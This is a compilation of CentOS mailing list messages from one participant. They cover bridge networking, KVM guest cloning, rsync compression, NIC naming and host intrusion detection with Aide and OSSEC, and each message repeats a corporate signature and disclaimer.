CAUTION: This email originated from outside of the organization. Do not click 
links or open attachments unless you recognize the sender and know the content 
is safe.


Hello. I desire to get bridge network working using virt-manager.
Centos 7 and centos 7 guest.

>From researching I think I need to have a ifcfg-br0 file like this ?

cat ifcfg-br0
DEVICE=nm-bridge0
STP=no
TYPE=Bridge
BOOTPROTO=none
IPADDR=192.168.1.8
PREFIX=32
GATEWAY=192.168.1.1
IPV6INIT=no
NAME=br0
ONBOOT=yes
DELAY=0

Is that for sure needed ? The use that nm-bridge0 as the network name?

I dont want to mess up my current setup.
Thanks,

Jerry
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Harriscomputer

Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com


[cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG]


2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com<http://www..com>


This message has been sent on behalf of a company that is part of the Harris 
Operating Group of Constellation Software Inc.

If you prefer not to be contacted by Harris Operating Group please notify 
us<http://subscribe.harriscomputer.com/>.



This message is intended exclusively for the individual or entity to which it 
is addressed. This communication may contain information that is proprietary, 
privileged or confidential or otherwise legally exempt from disclosure. If you 
are not the named addressee, you are not authorized to read, print, retain, 
copy or disseminate this message or any part of it. If you have received this 
message in error, please notify the sender immediately by e-mail and delete all 
copies of the message.




___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Zoom?

[Leroy Tennison]

I'm on Ubuntu and, no, it doesn't work.


From: CentOS  on behalf of Liam O'Toole 

Sent: Thursday, April 9, 2020 3:37 AM
To: centos@centos.org 
Subject: [EXTERNAL] Re: [CentOS] Zoom?


Harriscomputer

Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com


[cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG]


2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com<http://www..com>


This message has been sent on behalf of a company that is part of the Harris 
Operating Group of Constellation Software Inc.

If you prefer not to be contacted by Harris Operating Group please notify 
us<http://subscribe.harriscomputer.com/>.



This message is intended exclusively for the individual or entity to which it 
is addressed. This communication may contain information that is proprietary, 
privileged or confidential or otherwise legally exempt from disclosure. If you 
are not the named addressee, you are not authorized to read, print, retain, 
copy or disseminate this message or any part of it. If you have received this 
message in error, please notify the sender immediately by e-mail and delete all 
copies of the message.





On Sun, 05 Apr, 2020 at 18:34:36 -0400, mark wrote:
> Hi, folks,
>
>After I did a complete reinstall of current 7, with KDE instead of
> minimal, I'm mostly ok... except for Zoom. Has anyone gotten sound working
> with firefox? I get video, but it keeps claiming that my browser (the
> default firefox) can't access the system sound.
>
>Given that even as I type this, I'm streaming WUMB through its player
> I have noScript, but I enabled everything (except google-analytics), and no
> joy. I'd *really* rather use my browser than trust their app
>
>mark

I recommend installing Zoom as a flatpak:

https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fflathub.org%2fapps%2fdetails%2fus.zoom.Zoom=E,1,K5Y5M138hPU8kIAKZDtG7wgxiAimsZMkn_dSH_5fUIT41t2iEEH9wDFXddj-nSh160S407JVuiuIZUIeZzq_HrHe-XPwgLR_8uTfQzvA32OJ=1

It works well and is sandboxed to some extent at least.
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Windows 10 as guest on Centos 8

[Leroy Tennison]

I sense you're looking for a GUI solution here but, when I've run into trouble, 
my fallback is virt-install.


From: CentOS  on behalf of Liam O'Toole 

Sent: Friday, April 3, 2020 6:45 PM
To: centos@centos.org 
Subject: [EXTERNAL] Re: [CentOS] Windows 10 as guest on Centos 8


Harriscomputer

Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com


[cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG]


2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com<http://www..com>


This message has been sent on behalf of a company that is part of the Harris 
Operating Group of Constellation Software Inc.

If you prefer not to be contacted by Harris Operating Group please notify 
us<http://subscribe.harriscomputer.com/>.



This message is intended exclusively for the individual or entity to which it 
is addressed. This communication may contain information that is proprietary, 
privileged or confidential or otherwise legally exempt from disclosure. If you 
are not the named addressee, you are not authorized to read, print, retain, 
copy or disseminate this message or any part of it. If you have received this 
message in error, please notify the sender immediately by e-mail and delete all 
copies of the message.





On Fri, 03 Apr, 2020 at 00:49:30 +0300, Georgios wrote:
> Hi there!
> Im trying to install windows 10 as a guest on Centos 8.1
> I tried with cockpit and with boxes and both times my computer freezes
> during installation.
>
> Any ideas?
>
> Thanks in advance!
>

cockpit is intended as a replacement for virt-manager. When it fails, I
suggest you fall back on the tried-and-tested approach.
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

[CentOS] Upgraded to 7.10 from 6...

[Leroy Tennison]

This is a wild "shot in the dark" but you didn't happen to install an nvidia 
driver, did you?  Have regretted that from the day I "upgraded' to it from a 
generic driver.


From: CentOS  on behalf of mark 
Sent: Thursday, April 2, 2020 5:19 PM
To: CentOS mailing list 
Subject: [EXTERNAL] [CentOS] Upgraded to 7.10 from 6...

Let me start out by making clear I *LOATHE* gnome, ok? So I don't want
to hear about it.

What's happening is this: I did this:
yum groupinstall "Development and Creative Workstation"
yum groupinstall "KDE Plasma Workspaces"

Now, when I go in graphical mode, I try to change to kde on login. Nope
- minutes later, I can see a cursor, and a gray screen. Ditto on the
"safe mode", and ditto on "gnome classic".

What have I missed?

mark
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Harriscomputer

Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com


[cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG]


2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com<http://www..com>


This message has been sent on behalf of a company that is part of the Harris 
Operating Group of Constellation Software Inc.

If you prefer not to be contacted by Harris Operating Group please notify 
us<http://subscribe.harriscomputer.com/>.



This message is intended exclusively for the individual or entity to which it 
is addressed. This communication may contain information that is proprietary, 
privileged or confidential or otherwise legally exempt from disclosure. If you 
are not the named addressee, you are not authorized to read, print, retain, 
copy or disseminate this message or any part of it. If you have received this 
message in error, please notify the sender immediately by e-mail and delete all 
copies of the message.




___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] CentOS 7 host with guests as bridge cannot access host

[Leroy Tennison]

Wow, thanks for sharing, I'd have never dreamed it.


From: CentOS  on behalf of Jerry Geis 

Sent: Thursday, April 2, 2020 9:10 AM
To: CentOS mailing list 
Subject: [EXTERNAL] Re: [CentOS] CentOS 7 host with guests as bridge cannot 
access host

This is unfortunate.
https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fwiki.libvirt.org%2fpage%2fTroubleshootMacvtapHostFail=E,1,TqNsTVxQVBTpipmCCuG5tI25iPoaz-LZB2sqYNi5OPBkkLYh9oOrxZdYsgqiCUIn6E_5RLCpGmJg5-foVY9bCiyOSimZm0h1aZkDi0-3aBtGpaxlsoryjw,,=1

To the "normal" user - BRIDGE means guest is on the same network and has
access to the host.

Bummer.

Jerry
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Harriscomputer

Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com


[cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG]


2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com<http://www..com>


This message has been sent on behalf of a company that is part of the Harris 
Operating Group of Constellation Software Inc.

If you prefer not to be contacted by Harris Operating Group please notify 
us<http://subscribe.harriscomputer.com/>.



This message is intended exclusively for the individual or entity to which it 
is addressed. This communication may contain information that is proprietary, 
privileged or confidential or otherwise legally exempt from disclosure. If you 
are not the named addressee, you are not authorized to read, print, retain, 
copy or disseminate this message or any part of it. If you have received this 
message in error, please notify the sender immediately by e-mail and delete all 
copies of the message.




___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Need help to fix bug in rsync

[Leroy Tennison]

I appreciate the reply - it keeps me from wondering "is there something I 
should be concerned about?".  We use a co-location facility where we pay for 
bandwidth utilization so it's still an issue.


From: CentOS  on behalf of Pete Biggs 

Sent: Wednesday, March 25, 2020 1:32 PM
To: centos@centos.org 
Subject: [EXTERNAL] Re: [CentOS] Need help to fix bug in rsync


Harriscomputer

Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com


[cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG]


2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com<http://www..com>


This message has been sent on behalf of a company that is part of the Harris 
Operating Group of Constellation Software Inc.

If you prefer not to be contacted by Harris Operating Group please notify 
us<http://subscribe.harriscomputer.com/>.



This message is intended exclusively for the individual or entity to which it 
is addressed. This communication may contain information that is proprietary, 
privileged or confidential or otherwise legally exempt from disclosure. If you 
are not the named addressee, you are not authorized to read, print, retain, 
copy or disseminate this message or any part of it. If you have received this 
message in error, please notify the sender immediately by e-mail and delete all 
copies of the message.





On Wed, 2020-03-25 at 19:15 +0100, Simon Matter via CentOS wrote:
> > On Wed, 2020-03-25 at 14:39 +, Leroy Tennison wrote:
> > > Since you state that using -z is almost always a bad idea, could you
> > > provide the rationale for that?  I must be missing something.
> > >
> > I think the "rationale" is that at some point the
> > compression/decompression takes longer than the time reduction from
> > sending a compressed file.  It depends on the relative speeds of the
> > machines and the network.
> >
> > You have most to gain from compressing large files, but if they are
> > already compressed, then you have nothing to gain from just doing small
> > files.
> >
> > It obviously depends on your network speed and if you have a metered
> > connection, but does anyone really have such an ancient network
> > connection still these days - I mean if you have fast enough machines
> > at both ends to do rapid compression/decompression, it seems unlikely
> > that you will have a damp piece of string connecting them.
>
> I really don't understand the discussion here. What is wrong with using -z
> with rsync? We're using rsync with -z for backups and just don't want to
> waste bandwidth for nothing. We have better use for our bandwidth and it
> makes quite a difference when backing up terabytes of data.

I don't really care if you use -z, but you asked for the rationale, and
I gave you it. I'm not telling you what you should do.

I'll try and make it simpler - if rsync takes 1 second to compress the
file, then 1 second to decompress the file, and the whole transfer of
the file takes 11 seconds uncompressed vs 10 seconds compressed, then
dealing with file takes overall 12 seconds compressed, vs 11 seconds
uncompressed. It's not worth it.

But as I said it depends on your network and your machine speeds.  It's
up to you to decide what is best in your own situation.

P.


___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Need help to fix bug in rsync

[Leroy Tennison]

That's why I asked, I wanted to know if there was something inherently bad with 
"-z".  I had a situation where Postgresql was replicating 16M files every few 
minutes ("log shipping") on approximately 10 systems, got behind which resulted 
in almost continuous file transfer (of mostly null 16M files) and saturated the 
common link.  Specifying compression with file transfer cut transmission time 
by 5-10x resolving the problem.


From: CentOS  on behalf of Simon Matter via CentOS 

Sent: Wednesday, March 25, 2020 1:15 PM
To: CentOS mailing list 
Subject: [EXTERNAL] Re: [CentOS] Need help to fix bug in rsync



Harriscomputer

Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com


[cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG]


2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com<http://www..com>


This message has been sent on behalf of a company that is part of the Harris 
Operating Group of Constellation Software Inc.

If you prefer not to be contacted by Harris Operating Group please notify 
us<http://subscribe.harriscomputer.com/>.



This message is intended exclusively for the individual or entity to which it 
is addressed. This communication may contain information that is proprietary, 
privileged or confidential or otherwise legally exempt from disclosure. If you 
are not the named addressee, you are not authorized to read, print, retain, 
copy or disseminate this message or any part of it. If you have received this 
message in error, please notify the sender immediately by e-mail and delete all 
copies of the message.





t; On Wed, 2020-03-25 at 14:39 +, Leroy Tennison wrote:
>> Since you state that using -z is almost always a bad idea, could you
>> provide the rationale for that?  I must be missing something.
>>
> I think the "rationale" is that at some point the
> compression/decompression takes longer than the time reduction from
> sending a compressed file.  It depends on the relative speeds of the
> machines and the network.
>
> You have most to gain from compressing large files, but if they are
> already compressed, then you have nothing to gain from just doing small
> files.
>
> It obviously depends on your network speed and if you have a metered
> connection, but does anyone really have such an ancient network
> connection still these days - I mean if you have fast enough machines
> at both ends to do rapid compression/decompression, it seems unlikely
> that you will have a damp piece of string connecting them.

I really don't understand the discussion here. What is wrong with using -z
with rsync? We're using rsync with -z for backups and just don't want to
waste bandwidth for nothing. We have better use for our bandwidth and it
makes quite a difference when backing up terabytes of data.

The only reason why I asked for help is because we don't want to double
compress data which is already compressed. This is what currently is
broken in rsync without manually specifying a skip-compress list. Fixing
it would help all those who don't know it's broken now.

Thanks,
Simon

___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Need help to fix bug in rsync

[Leroy Tennison]

Since you state that using -z is almost always a bad idea, could you provide 
the rationale for that?  I must be missing something.


From: CentOS  on behalf of Peter Kjellström 

Sent: Wednesday, March 25, 2020 9:34 AM
To: Simon Matter 
Cc: centos@centos.org 
Subject: [EXTERNAL] Re: [CentOS] Need help to fix bug in rsync

On Wed, 25 Mar 2020 14:49:24 +0100
Simon Matter via CentOS  wrote:

> Hi,
>
> I've discovered a bug in rsync which leads to increased CPU usage and
> slower transfers in many situations.
>
> When syncing with compression (-z)

Tbh, using -z with rsync is almost always a bad idea (unless you're on
some pre-historic type of network link..).

/Peter
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Harriscomputer

Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com


[cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG]


2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com<http://www..com>


This message has been sent on behalf of a company that is part of the Harris 
Operating Group of Constellation Software Inc.

If you prefer not to be contacted by Harris Operating Group please notify 
us<http://subscribe.harriscomputer.com/>.



This message is intended exclusively for the individual or entity to which it 
is addressed. This communication may contain information that is proprietary, 
privileged or confidential or otherwise legally exempt from disclosure. If you 
are not the named addressee, you are not authorized to read, print, retain, 
copy or disseminate this message or any part of it. If you have received this 
message in error, please notify the sender immediately by e-mail and delete all 
copies of the message.




___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] KVM clone

[Leroy Tennison]

Since you asked, the circumstance warranting registry editing is cloning a 
running system to create a new instance for a different purpose while bringing 
it up on the same subnet.  Yes, it's a little messy but it works.  And thanks 
for the pointer about virt-sysprep.


From: CentOS  on behalf of Charles Polisher via 
CentOS 
Sent: Saturday, February 8, 2020 11:58 AM
To: Leon Fauster ; CentOS mailing list 


Harriscomputer

Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com


[cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG]


2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com<http://www..com>


This message has been sent on behalf of a company that is part of the Harris 
Operating Group of Constellation Software Inc.

If you prefer not to be contacted by Harris Operating Group please notify 
us<http://subscribe.harriscomputer.com/>.



This message is intended exclusively for the individual or entity to which it 
is addressed. This communication may contain information that is proprietary, 
privileged or confidential or otherwise legally exempt from disclosure. If you 
are not the named addressee, you are not authorized to read, print, retain, 
copy or disseminate this message or any part of it. If you have received this 
message in error, please notify the sender immediately by e-mail and delete all 
copies of the message.





Subject: [EXTERNAL] Re: [CentOS] KVM clone

On 2020-02-07 20:14, Leon Fauster via CentOS wrote:
> Am 07.02.20 um 17:43 schrieb Leroy Tennison:
> > Yes, have done it a few times.  If you need it to have a different IP 
> > address/name/license then bring up a new definition without a NIC, login 
> > via virt-manager.  For the IP address, search the registry for the current 
> > IP address and change the appropriate entries.  Use standard Windows 
> > utilities to change the description/name.  For the license, search for 
> > "Product" and select "View your Product ID", in that dialog there should be 
> > an option to change the product key.  Once done add the same NIC as the 
> > other definition had and restart.  This has worked all but once for me.  
> > The one time it didn't, Windows discerned a network problem (IP address) 
> > and provided a way to fix it.
> I remember that for a cloned win system the SID should be also changed.
> https://en.wikipedia.org/wiki/Security_Identifier

I have successfully cloned many versions of Windows OS, then
booted the clone and changed static IP using Network Connections
widget -> Change Adaptor Settings, without incident, where my
intent is never to run both systems at the same time. Not clear
to me what circumstance would warrent editing the registry to
obtain this result, but everything has a good use case I
suppose?

For completeness, as OP might know, Microsoft provides the
'sysprep' utility to prepare a system for cloning. In RHEL6 / C6
and more recent, Linux guests can be similarly prepared with
'virt-sysprep'.

--
Charles Polisher
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] CentOS 7 : network interface renamed from eth0 to eth1 after reboot

[Leroy Tennison]

There may be ways to force NIC naming, I've done so but only on Ubuntu so 
you'll need to do the research if it's important to you.  Things to look for 
based on my experience: 70-persistent-net.rules, net.ifnames=0, biosdevname=0.


From: CentOS  on behalf of Nicolas Kovacs 

Sent: Sunday, February 9, 2020 12:51 PM
To: centos@centos.org 
Subject: [EXTERNAL] Re: [CentOS] CentOS 7 : network interface renamed from eth0 
to eth1 after reboot

Le 09/02/2020 à 16:54, Alexander Dalloz a écrit :
> "Kernel always uses the ethX naming convention at boot when it enumerates
> network devices. Due to parallelization, the order of the kernel interface
> enumeration is expected to vary across reboots."

Thanks for the heads up.

I experimented quite a bit, and found some surprising behavior. So I documented
everything in a little blog article.

   * 
https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fwww.microlinux.fr%2finterfaces-reseau-persistantes%2f=E,1,apWInXfONKIS7FI-2r96hzoROBMB28lpEncRGtBCvS-yWk5DU4roROpidqfC06FNDn2rlEYO-xJjHn2B0klz4_h1y7kiuBvlSjCMer8MBCuMgAcKUg,,=1

Cheers,

Niki

--
Microlinux - Solutions informatiques durables
7, place de l'église - 30730 Montpezat
Site : 
https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fwww.microlinux.fr=E,1,egz8jO853imKX3mT5r9bs5vOCANcassZ0dea14ELcSZMwyZ5fJhfqPU6G1SltXyA8jjCrUwRU-k0Hj5oXsh2RioeNQj-7HsnfPYs1pYwHt6Vnp0cvNSVHpBAPA,,=1
Mail : i...@microlinux.fr
Tél. : 04 66 63 10 32
Mob. : 06 51 80 12 12
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Harriscomputer

Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com


[cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG]


2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com<http://www..com>


This message has been sent on behalf of a company that is part of the Harris 
Operating Group of Constellation Software Inc.

If you prefer not to be contacted by Harris Operating Group please notify 
us<http://subscribe.harriscomputer.com/>.



This message is intended exclusively for the individual or entity to which it 
is addressed. This communication may contain information that is proprietary, 
privileged or confidential or otherwise legally exempt from disclosure. If you 
are not the named addressee, you are not authorized to read, print, retain, 
copy or disseminate this message or any part of it. If you have received this 
message in error, please notify the sender immediately by e-mail and delete all 
copies of the message.




___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

[CentOS] KVM clone

[Leroy Tennison]

Yes, have done it a few times.  If you need it to have a different IP 
address/name/license then bring up a new definition without a NIC, login via 
virt-manager.  For the IP address, search the registry for the current IP 
address and change the appropriate entries.  Use standard Windows utilities to 
change the description/name.  For the license, search for "Product" and select 
"View your Product ID", in that dialog there should be an option to change the 
product key.  Once done add the same NIC as the other definition had and 
restart.  This has worked all but once for me.  The one time it didn't, Windows 
discerned a network problem (IP address) and provided a way to fix it.

From: CentOS  on behalf of Nikos Gatsis - Qbit 

Sent: Friday, February 7, 2020 5:22 AM
To: centos@centos.org 
Subject: [EXTERNAL] [CentOS] KVM clone

Hello everybody.

I have a simple question.

If I clone an existing KVM image of win server with static IP, the clone
will have the same IP?

It's probably stupid question, but I want to be sure.

I have a full updated centos 7 box.

Thank you in advance.

Nikos.


___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Harriscomputer

Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com


[cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG]


2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com<http://www..com>


This message has been sent on behalf of a company that is part of the Harris 
Operating Group of Constellation Software Inc.

If you prefer not to be contacted by Harris Operating Group please notify 
us<http://subscribe.harriscomputer.com/>.



This message is intended exclusively for the individual or entity to which it 
is addressed. This communication may contain information that is proprietary, 
privileged or confidential or otherwise legally exempt from disclosure. If you 
are not the named addressee, you are not authorized to read, print, retain, 
copy or disseminate this message or any part of it. If you have received this 
message in error, please notify the sender immediately by e-mail and delete all 
copies of the message.




___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Upgrade Centos 6 (32 Bits) to Centos 7 (32 Bits)

[Leroy Tennison]

-> With Debian, the biggest difference is update (if you are using the 
command-line).

Another big difference is the location and format of the networking files - 
/etc/network/interfaces instead of /etc/sysconfig/network-scripts/ifcfg*.

From: CentOS  on behalf of MAILIST 

Sent: Wednesday, November 27, 2019 9:39 AM
To: CentOS mailing list 
Subject: [EXTERNAL] Re: [CentOS] Upgrade Centos 6 (32 Bits) to Centos 7 (32 
Bits)

> I have a very old PC ( Acer2000) 32 Bits. On this machine I am running (Do
> not laugh) SCO Unix in an antique version : So Centos6 probes with the
> bootloader on this OS and other OS s.

There is a group that voluntarily maintains a 32-bit CentOS 7.  I installed
that on an old Dell Celeron desktop.  The performance was so poor, it was
unusable.  Then, I tried the lubuntu distro, and that has been running
smoothly since July.  It is also well-maintained, as there are regular
updates.  Lubuntu is a derivitive of Ubuntu, which is a derivative of Debian.
With Debian, the biggest difference is update (if you are using the command-
line).

Todd Merriman
Software Toolz, Inc.
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Harriscomputer

Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com


[cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG]


2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com<http://www..com>


This message has been sent on behalf of a company that is part of the Harris 
Operating Group of Constellation Software Inc.

If you prefer not to be contacted by Harris Operating Group please notify 
us<http://subscribe.harriscomputer.com/>.



This message is intended exclusively for the individual or entity to which it 
is addressed. This communication may contain information that is proprietary, 
privileged or confidential or otherwise legally exempt from disclosure. If you 
are not the named addressee, you are not authorized to read, print, retain, 
copy or disseminate this message or any part of it. If you have received this 
message in error, please notify the sender immediately by e-mail and delete all 
copies of the message.




___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] how to know when a system is compromised

[Leroy Tennison]

Actually, a defense here is to umount the path then remount it as a part of 
running the Aide script.  There may be an end-run to this as well- security is 
a never-ending battle.


From: CentOS  on behalf of Leroy Tennison 

Sent: Thursday, November 14, 2019 1:20 PM
To: CentOS mailing list 
Subject: Re: [CentOS] how to know when a system is compromised

 Thanks - I'll keep that in mind...

Harriscomputer

Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com


[cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG]


2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com<http://www..com>


This message has been sent on behalf of a company that is part of the Harris 
Operating Group of Constellation Software Inc.

If you prefer not to be contacted by Harris Operating Group please notify 
us<http://subscribe.harriscomputer.com/>.



This message is intended exclusively for the individual or entity to which it 
is addressed. This communication may contain information that is proprietary, 
privileged or confidential or otherwise legally exempt from disclosure. If you 
are not the named addressee, you are not authorized to read, print, retain, 
copy or disseminate this message or any part of it. If you have received this 
message in error, please notify the sender immediately by e-mail and delete all 
copies of the message.






From: CentOS  on behalf of Chris Adams 

Sent: Thursday, November 14, 2019 10:57 AM
To: centos@centos.org 
Subject: [EXTERNAL] Re: [CentOS] how to know when a system is compromised

Once upon a time, Leroy Tennison  said:
>  The executable could be placed on mounted read-only media

That's not as secure as you think.  Linux bind mounts can mount a file
over another file (plus there's overlay filesystems), so it's possible
to replace a binary even on a read-only device.

--
Chris Adams 
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Harriscomputer

Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com


[cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG]


2220 Bush Dr
McKinney, Texas
75070
https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fwww.datavoiceint.com=E,1,2WCvbSNJvmqaxEcIPqawoTvGCYMAZT8KKulxxbmjkGLa2NyJ5IO_EL51Q21yyoZLhvJczf6IGyKITC8kW5WKMrP4AYTtFLWcu5R1E3VMstTAfGRFhCRv0w,,=1<http://www..com>


This message has been sent on behalf of a company that is part of the Harris 
Operating Group of Constellation Software Inc.

If you prefer not to be contacted by Harris Operating Group please notify 
us<https://linkprotect.cudasvc.com/url?a=http%3a%2f%2fsubscribe.harriscomputer.com%2f=E,1,bJ-3jUtOeY3WPfKHckYn-Ynl3cYkeINegX0H-YsrIDlgsWb1g8GzM6JCS3rmWWxVwOPgOf_AMxvsKjsW_iVVobRWFKpTzsvz4Bfhlu5s=1>.



This message is intended exclusively for the individual or entity to which it 
is addressed. This communication may contain information that is proprietary, 
privileged or confidential or otherwise legally exempt from disclosure. If you 
are not the named addressee, you are not authorized to read, print, retain, 
copy or disseminate this message or any part of it. If you have received this 
message in error, please notify the sender immediately by e-mail and delete all 
copies of the message.




___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] how to know when a system is compromised

[Leroy Tennison]

 Thanks - I'll keep that in mind...

From: CentOS  on behalf of Chris Adams 

Sent: Thursday, November 14, 2019 10:57 AM
To: centos@centos.org 
Subject: [EXTERNAL] Re: [CentOS] how to know when a system is compromised

Once upon a time, Leroy Tennison  said:
>  The executable could be placed on mounted read-only media

That's not as secure as you think.  Linux bind mounts can mount a file
over another file (plus there's overlay filesystems), so it's possible
to replace a binary even on a read-only device.

--
Chris Adams 
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Harriscomputer

Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com


[cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG]


2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com<http://www..com>


This message has been sent on behalf of a company that is part of the Harris 
Operating Group of Constellation Software Inc.

If you prefer not to be contacted by Harris Operating Group please notify 
us<http://subscribe.harriscomputer.com/>.



This message is intended exclusively for the individual or entity to which it 
is addressed. This communication may contain information that is proprietary, 
privileged or confidential or otherwise legally exempt from disclosure. If you 
are not the named addressee, you are not authorized to read, print, retain, 
copy or disseminate this message or any part of it. If you have received this 
message in error, please notify the sender immediately by e-mail and delete all 
copies of the message.




___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

[CentOS] how to know when a system is compromised

[Leroy Tennison]

This is one where there's probably no limit to what you could do.  We have a 
high-security environment and are using Aide and OSSEC.

Aide has been good at reporting file system changes and is very granular, the 
dilemma is what to monitor and what to ignore (keep from being inundated with 
reports of innocuous changes at the risk of missing something).  However, it is 
not daemon-based so changes between runs which are undone go unnoticed.  Also, 
somehow you need to protect the executable and configuration file so that an 
attacker can't replace the executable or read the configuration and find a way 
around it.  The executable could be placed on mounted read-only media, last 
time I checked Netac and Kanguru still made USB sticks with write-protect 
switches.  Our best effort for protecting configuration is to deliver the 
configuration file just-in-time and delete it after the scheduled run, not a 
great solution, anybody have a better idea?

OSSEC is daemon-based and centrally-managed.  It is a HIDS rather than just a 
FIMS as Aide is.  Its log monitoring has surfaced operational issues in 
addition to security ones (Postfix got in an odd state and had to be restarted 
for example).  Unfortunately, false positives are common, especially if you use 
the "detect new files" feature.  They admit that dealing with software updates 
is problematic.

I've used auditd to trace down what ended up being a funny situation, Aide 
detected that /etc/hosts.deny would change timestamp but nothing else, turns 
out OSSEC has an active response feature to block attacks which involves 
updating that file to block a host for 10 minutes.

You could also look into inotify options and Samhain is another HIDS (I'd love 
to hear about anyone's experience with it).  A free variant of tripwire may 
still exist but is probably unsupported and Aide is a clone of it.

I noticed that rootkit detection has also been mentioned in another reply.

From: CentOS  on behalf of Christopher Wensink 

Sent: Thursday, November 14, 2019 9:40 AM
To: CentOS mailing list 
Subject: [EXTERNAL] [CentOS] how to know when a system is compromised

How do you know when a Linux system has been compromised?

Every day I watch our systems with all the typical tools, ps, top, who,
I watch firewall / IPS logs, I have logwatch setup and mailing daily
summaries to me and I dive deeper into logs if something looks suspicious.

